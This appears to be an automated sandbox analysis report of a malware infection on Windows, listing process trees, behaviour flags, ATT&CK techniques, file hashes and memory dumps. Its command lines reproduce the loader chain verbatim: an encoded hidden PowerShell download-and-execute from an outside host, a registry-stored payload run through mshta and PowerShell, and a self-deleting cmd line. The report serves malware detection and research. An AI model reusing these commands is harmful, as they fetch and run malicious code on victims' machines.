PID 3204 wrote to memory of 4016	3204	Explorer.EXE	RuntimeBroker.exe
PID 3204 wrote to memory of 4016	3204	Explorer.EXE	RuntimeBroker.exe
PID 3204 wrote to memory of 2100	3204	Explorer.EXE	RuntimeBroker.exe
PID 3204 wrote to memory of 2100	3204	Explorer.EXE	RuntimeBroker.exe
PID 3204 wrote to memory of 2100	3204	Explorer.EXE	RuntimeBroker.exe
PID 3204 wrote to memory of 2100	3204	Explorer.EXE	RuntimeBroker.exe
PID 3204 wrote to memory of 1432	3204	Explorer.EXE	RuntimeBroker.exe
PID 3204 wrote to memory of 1432	3204	Explorer.EXE	RuntimeBroker.exe
PID 3204 wrote to memory of 1432	3204	Explorer.EXE	RuntimeBroker.exe
PID 3204 wrote to memory of 1432	3204	Explorer.EXE	RuntimeBroker.exe
PID 3204 wrote to memory of 2244	3204	Explorer.EXE	cmd.exe
PID 3204 wrote to memory of 2244	3204	Explorer.EXE	cmd.exe
PID 3204 wrote to memory of 2244	3204	Explorer.EXE	cmd.exe
PID 3204 wrote to memory of 4132	3204	Explorer.EXE	cmd.exe
PID 3204 wrote to memory of 4132	3204	Explorer.EXE	cmd.exe
PID 3204 wrote to memory of 4132	3204	Explorer.EXE	cmd.exe
PID 3204 wrote to memory of 4132	3204	Explorer.EXE	cmd.exe
PID 3204 wrote to memory of 2244	3204	Explorer.EXE	cmd.exe
PID 3204 wrote to memory of 2244	3204	Explorer.EXE	cmd.exe
PID 3204 wrote to memory of 4132	3204	Explorer.EXE	cmd.exe
PID 3204 wrote to memory of 4132	3204	Explorer.EXE	cmd.exe
PID 2244 wrote to memory of 4644	2244	cmd.exe	PING.EXE
PID 2244 wrote to memory of 4644	2244	cmd.exe	PING.EXE
PID 2244 wrote to memory of 4644	2244	cmd.exe	PING.EXE
PID 2244 wrote to memory of 4644	2244	cmd.exe	PING.EXE
PID 2244 wrote to memory of 4644	2244	cmd.exe	PING.EXE

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3720

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:1432

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2100

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4016

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3204

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Direzione.url
2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1904

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\7A5L91DP\client_5[1].hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2104

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
4⤵
- Suspicious use of WriteProcessMemory
PID:3232

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4148

C:\Users\Admin\AppData\Local\Temp\yYqgVvhX.exe
"C:\Users\Admin\AppData\Local\Temp\yYqgVvhX.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 480
7⤵
- Program crash
PID:2460

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ifod='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ifod).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\DD164BDA-982A-17AD-8A61-4C3B5E25409F\\\FolderOptions'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fpmhxagbfp -value gp; new-alias -name sqondslx -value iex; sqondslx ([System.Text.Encoding]::ASCII.GetString((fpmhxagbfp "HKCU:Software\AppDataLow\Software\Microsoft\DD164BDA-982A-17AD-8A61-4C3B5E25409F").MelodyTool))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:472

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rd4ggfc0\rd4ggfc0.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:5012

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES44CF.tmp" "c:\Users\Admin\AppData\Local\Temp\rd4ggfc0\CSCDAD9EB7D2C6741709FB1A1B38DB2A865.TMP"
5⤵
PID:4256

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wmy1f1i4\wmy1f1i4.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4736

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4637.tmp" "c:\Users\Admin\AppData\Local\Temp\wmy1f1i4\CSC1C71704477D4128B49643ECE09FAB1E.TMP"
5⤵
PID:4772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\yYqgVvhX.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2244

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4644

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:4132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2528 -ip 2528
1⤵
PID:2400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\7A5L91DP\client_5[1].hta
Filesize
22KB

MD5
988f8a03ac893e41d4f9aaca5addafe1

SHA1
d3bda7e7be11da19cd3adf16a4c58548eb573f74

SHA256
0389108b0322ecbbadd21a245c1b75f93e38a2e51a8b38a385596ebe05c323cf

SHA512
2dd80008e91d35da4d60572be008ab60ae7edd5ebe5b94518c3bfb3aa573c812e2abeb3c7d4033ca9cf5b99e64db5537c79b3e6aae8bd89e894de7fcc2a5b1c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
16KB

MD5
2d011d1051e78b598634e7e0db8d455b

SHA1
7680256f57f1744edf482fca6bdca29ce209b80f

SHA256
58c08c42fc91c511d181616d6a05c3a76b9588ebe74af6ee2344912c57d156e5

SHA512
35a043130e8026aec5a9f3f608d9a9640d863ab94d01b22cf53dbff71a21b9b7234128040fd9415934e9f0ec2ad737c35e7837378c9ce87d3f93f0ad71ee950c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES44CF.tmp
Filesize
1KB

MD5
178d5cc2a29d714123c03737beb87604

SHA1
33dd5a6bca2e57912c7e8117e978d52398197017

SHA256
2d63531aebd4581bf9ad62cf80692055cd501c05c01d0bb7e716c208afed88f4

SHA512
343f8f170d2791de36025e6b3d3865cd0dce8aa3e2399713d583fbeee0c5e53d53c41a4a77901a59e510b2686bf8422a1944c1a8d97e0f589400624f09ba3b42

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES4637.tmp
Filesize
1KB

MD5
cda225eccd79cc55a742b23a2468e7c4

SHA1
5820a68f93913bf57274657a9513ba32dce9f92f

SHA256
302d22525820a683e7d555cdcb8b0343cfa95f0922ed1a50420940e8b33cb7a0

SHA512
725617985fd92d6b6b9eff2e81984b55c36585f621d4c8781a39dd72b02d9d5209e2cbec8ca94c5053cec72cec34102e449a65cc83815247f734cf2435e31002

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a4xsp0zd.42m.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\rd4ggfc0\rd4ggfc0.dll
Filesize
3KB

MD5
63c44a1145f8768c6bf973477866ae2d

SHA1
77bc179b02136c3d6535793f81a367fdc8da4d53

SHA256
e3d420fff63c6d6ef3e0e0a96c5975f8cee6e109feb9d0eeb15c691fecfe30ab

SHA512
9755e5d30035cf1206b7da34376c53f602cbd734487af690a251a7115cce98e25b05a5f7a9b1dec3f52fa99f9c9a085064df6cf005b777e3c9d9fc7bf742fdd5

Download Submit
C:\Users\Admin\AppData\Local\Temp\wmy1f1i4\wmy1f1i4.dll
Filesize
3KB

MD5
3c6d12249babfc16eb89a5ee369a0cb2

SHA1
eeb6b8f583f2444fa417c92adbf1008d3f412532

SHA256
a454604a3ff934790a149cfa0d2d2e1ddce966b7100978f911a0d70a08a3911f

SHA512
45cfaa08f9178b733706f62052d78d06604411b987eabd1ebd8798a4152ff163c36f146038c760322937c07121d9e8c7c64ff755f4480f019c4be0d827be4f50

Download Submit
C:\Users\Admin\AppData\Local\Temp\yYqgVvhX.exe
Filesize
292KB

MD5
f63d00d962c43095a6de3838401e5b59

SHA1
c49feab758326a965d30fef2807291cf39c0d61a

SHA256
713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf

SHA512
12f2fa8d97edcc5e045d222bc0b74521767f13bc18d190a965b14095367e73fb24cd387e354f345675954f47fdd9e174ff8e257b32e7aaa04cd22b1b17cbd9d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\yYqgVvhX.exe
Filesize
292KB

MD5
f63d00d962c43095a6de3838401e5b59

SHA1
c49feab758326a965d30fef2807291cf39c0d61a

SHA256
713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf

SHA512
12f2fa8d97edcc5e045d222bc0b74521767f13bc18d190a965b14095367e73fb24cd387e354f345675954f47fdd9e174ff8e257b32e7aaa04cd22b1b17cbd9d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\yYqgVvhX.exe
Filesize
292KB

MD5
f63d00d962c43095a6de3838401e5b59

SHA1
c49feab758326a965d30fef2807291cf39c0d61a

SHA256
713061a3f104a116e82686dcc3d7c28e6bac0ea519a166c43a65b2f10cd0bdcf

SHA512
12f2fa8d97edcc5e045d222bc0b74521767f13bc18d190a965b14095367e73fb24cd387e354f345675954f47fdd9e174ff8e257b32e7aaa04cd22b1b17cbd9d7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rd4ggfc0\CSCDAD9EB7D2C6741709FB1A1B38DB2A865.TMP
Filesize
652B

MD5
6209e60e865fdcb10975b75d1da8ec4e

SHA1
cb89ed816b39d4af7fcb9c54d8efeb508b23ea79

SHA256
c2c01694db35baff5358a9b256820e852316e8dca2d20dc0d4535cd790495a82

SHA512
d68e0a67eb61928731d022fd37db35823facae3cbf94cf07b4dfb4cc17428e83d9a307612ed5ec33a7b3b5dd3496276e707e80bf37de2666cb2da9572d11fe0b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rd4ggfc0\rd4ggfc0.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rd4ggfc0\rd4ggfc0.cmdline
Filesize
369B

MD5
4abcaaf067f2c13fd210c6552381b4af

SHA1
feb866f7bb8893b58637864658f73e6ab5d905e9

SHA256
96c904d81fc6cde6cad3956125c3a1ec9017d140514402cc4e109778756f0da8

SHA512
84b0fe5f587a6faca38d8fff4da2d3dd585fd9cf720ebdf31944c91f2d6bcf93d7638a7129c96e37d698d1a450c6af07861dfbe129c781360ab1ceaacfdf1d8a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wmy1f1i4\CSC1C71704477D4128B49643ECE09FAB1E.TMP
Filesize
652B

MD5
f12fd583fd7a5c534dc79c87d4479fa6

SHA1
af1f44ecb2644c858f3474724f80ba64f831db4d

SHA256
0606b9207d1c6c526e6847de57d4eba686a35061b5a43f30fbaaad82789841c9

SHA512
3b02ccd4058a77f87d433ee2abe156f683779013e1bb57221d379fa97459156f295563bfdbe4e25dc4bd706365b3a46561e44544d3f1e0bef8bdca40d7ad7c9d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wmy1f1i4\wmy1f1i4.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\wmy1f1i4\wmy1f1i4.cmdline
Filesize
369B

MD5
a8d6d3effdb91a3707e737a791427782

SHA1
e69a9b792581a42c874426766d242da8733ea597

SHA256
172d1b231f09626786175b4abe2579e87e1847770d9b7daec538da279b6581c6

SHA512
ea6782504d173fe4cc5c20c319627e3198bd6681be99dffd8b7eb8a76c61b4ff85ccc840cda665f17b15bccdf4c74c90cd5f940155b530e9db1d8ba514b7171c

Download Submit
memory/472-106-0x000002669FE20000-0x000002669FE28000-memory.dmp

Filesize
32KB

Download
memory/472-77-0x000002669FCC0000-0x000002669FCD0000-memory.dmp

Filesize
64KB

Download
memory/472-113-0x000002669FE30000-0x000002669FE6D000-memory.dmp

Filesize
244KB

Download
memory/472-123-0x00007FFDEBD70000-0x00007FFDEC831000-memory.dmp

Filesize
10.8MB

Download
memory/472-92-0x000002669FCB0000-0x000002669FCB8000-memory.dmp

Filesize
32KB

Download
memory/472-79-0x000002669FCC0000-0x000002669FCD0000-memory.dmp

Filesize
64KB

Download
memory/472-65-0x000002669FC80000-0x000002669FCA2000-memory.dmp

Filesize
136KB

Download
memory/472-78-0x000002669FCC0000-0x000002669FCD0000-memory.dmp

Filesize
64KB

Download
memory/472-76-0x00007FFDEBD70000-0x00007FFDEC831000-memory.dmp

Filesize
10.8MB

Download
memory/1432-144-0x000001B9B4360000-0x000001B9B4361000-memory.dmp

Filesize
4KB

Download
memory/1432-142-0x000001B9B4840000-0x000001B9B48E4000-memory.dmp

Filesize
656KB

Download
memory/1432-176-0x000001B9B4840000-0x000001B9B48E4000-memory.dmp

Filesize
656KB

Download
memory/2100-137-0x000001B75C440000-0x000001B75C4E4000-memory.dmp

Filesize
656KB

Download
memory/2100-138-0x000001B75BBE0000-0x000001B75BBE1000-memory.dmp

Filesize
4KB

Download
memory/2100-173-0x000001B75C440000-0x000001B75C4E4000-memory.dmp

Filesize
656KB

Download
memory/2244-175-0x00000207B2EF0000-0x00000207B2F94000-memory.dmp

Filesize
656KB

Download
memory/2244-153-0x00000207B2DE0000-0x00000207B2DE1000-memory.dmp

Filesize
4KB

Download
memory/2244-151-0x00000207B2EF0000-0x00000207B2F94000-memory.dmp

Filesize
656KB

Download
memory/2528-58-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/2528-50-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/2528-49-0x00000000022D0000-0x00000000022DB000-memory.dmp

Filesize
44KB

Download
memory/2528-48-0x0000000002330000-0x0000000002430000-memory.dmp

Filesize
1024KB

Download
memory/2528-51-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/2528-52-0x0000000002330000-0x0000000002430000-memory.dmp

Filesize
1024KB

Download
memory/2528-55-0x0000000002310000-0x000000000231D000-memory.dmp

Filesize
52KB

Download
memory/2528-54-0x0000000000400000-0x000000000228F000-memory.dmp

Filesize
30.6MB

Download
memory/2528-53-0x00000000022D0000-0x00000000022DB000-memory.dmp

Filesize
44KB

Download
memory/3204-110-0x0000000008460000-0x0000000008504000-memory.dmp

Filesize
656KB

Download
memory/3204-115-0x0000000002980000-0x0000000002981000-memory.dmp

Filesize
4KB

Download
memory/3204-116-0x0000000008460000-0x0000000008504000-memory.dmp

Filesize
656KB

Download
memory/3204-159-0x0000000008460000-0x0000000008504000-memory.dmp

Filesize
656KB

Download
memory/3720-125-0x000001A4AE340000-0x000001A4AE3E4000-memory.dmp

Filesize
656KB

Download
memory/3720-126-0x000001A4AE3F0000-0x000001A4AE3F1000-memory.dmp

Filesize
4KB

Download
memory/3720-168-0x000001A4AE340000-0x000001A4AE3E4000-memory.dmp

Filesize
656KB

Download
memory/4016-172-0x00000189864B0000-0x0000018986554000-memory.dmp

Filesize
656KB

Download
memory/4016-132-0x0000018986470000-0x0000018986471000-memory.dmp

Filesize
4KB

Download
memory/4016-131-0x00000189864B0000-0x0000018986554000-memory.dmp

Filesize
656KB

Download
memory/4132-161-0x0000000001240000-0x00000000012D8000-memory.dmp

Filesize
608KB

Download
memory/4132-156-0x0000000000E90000-0x0000000000E91000-memory.dmp

Filesize
4KB

Download
memory/4132-152-0x0000000001240000-0x00000000012D8000-memory.dmp

Filesize
608KB

Download
memory/4148-22-0x0000000005BC0000-0x0000000005BDE000-memory.dmp

Filesize
120KB

Download
memory/4148-9-0x0000000004BF0000-0x0000000004C12000-memory.dmp

Filesize
136KB

Download
memory/4148-25-0x0000000004830000-0x0000000004840000-memory.dmp

Filesize
64KB

Download
memory/4148-26-0x0000000004830000-0x0000000004840000-memory.dmp

Filesize
64KB

Download
memory/4148-27-0x0000000007230000-0x00000000078AA000-memory.dmp

Filesize
6.5MB

Download
memory/4148-23-0x0000000005BF0000-0x0000000005C3C000-memory.dmp

Filesize
304KB

Download
memory/4148-46-0x00000000713A0000-0x0000000071B50000-memory.dmp

Filesize
7.7MB

Download
memory/4148-18-0x0000000005540000-0x0000000005894000-memory.dmp

Filesize
3.3MB

Download
memory/4148-11-0x00000000054A0000-0x0000000005506000-memory.dmp

Filesize
408KB

Download
memory/4148-28-0x0000000006040000-0x000000000605A000-memory.dmp

Filesize
104KB

Download
memory/4148-10-0x0000000004C20000-0x0000000004C86000-memory.dmp

Filesize
408KB

Download
memory/4148-24-0x00000000713A0000-0x0000000071B50000-memory.dmp

Filesize
7.7MB

Download
memory/4148-29-0x0000000004830000-0x0000000004840000-memory.dmp

Filesize
64KB

Download
memory/4148-8-0x0000000004E70000-0x0000000005498000-memory.dmp

Filesize
6.2MB

Download
memory/4148-31-0x0000000007050000-0x00000000070E6000-memory.dmp

Filesize
600KB

Download
memory/4148-5-0x00000000713A0000-0x0000000071B50000-memory.dmp

Filesize
7.7MB

Download
memory/4148-6-0x0000000004830000-0x0000000004840000-memory.dmp

Filesize
64KB

Download
memory/4148-32-0x0000000007000000-0x0000000007022000-memory.dmp

Filesize
136KB

Download
memory/4148-33-0x0000000007E60000-0x0000000008404000-memory.dmp

Filesize
5.6MB

Download
memory/4148-7-0x0000000002570000-0x00000000025A6000-memory.dmp

Filesize
216KB

Download
memory/4644-174-0x000001F6E0D90000-0x000001F6E0E34000-memory.dmp

Filesize
656KB

Download
memory/4644-164-0x000001F6E0BD0000-0x000001F6E0BD1000-memory.dmp

Filesize
4KB

Download
memory/4644-163-0x000001F6E0D90000-0x000001F6E0E34000-memory.dmp

Filesize
656KB

Download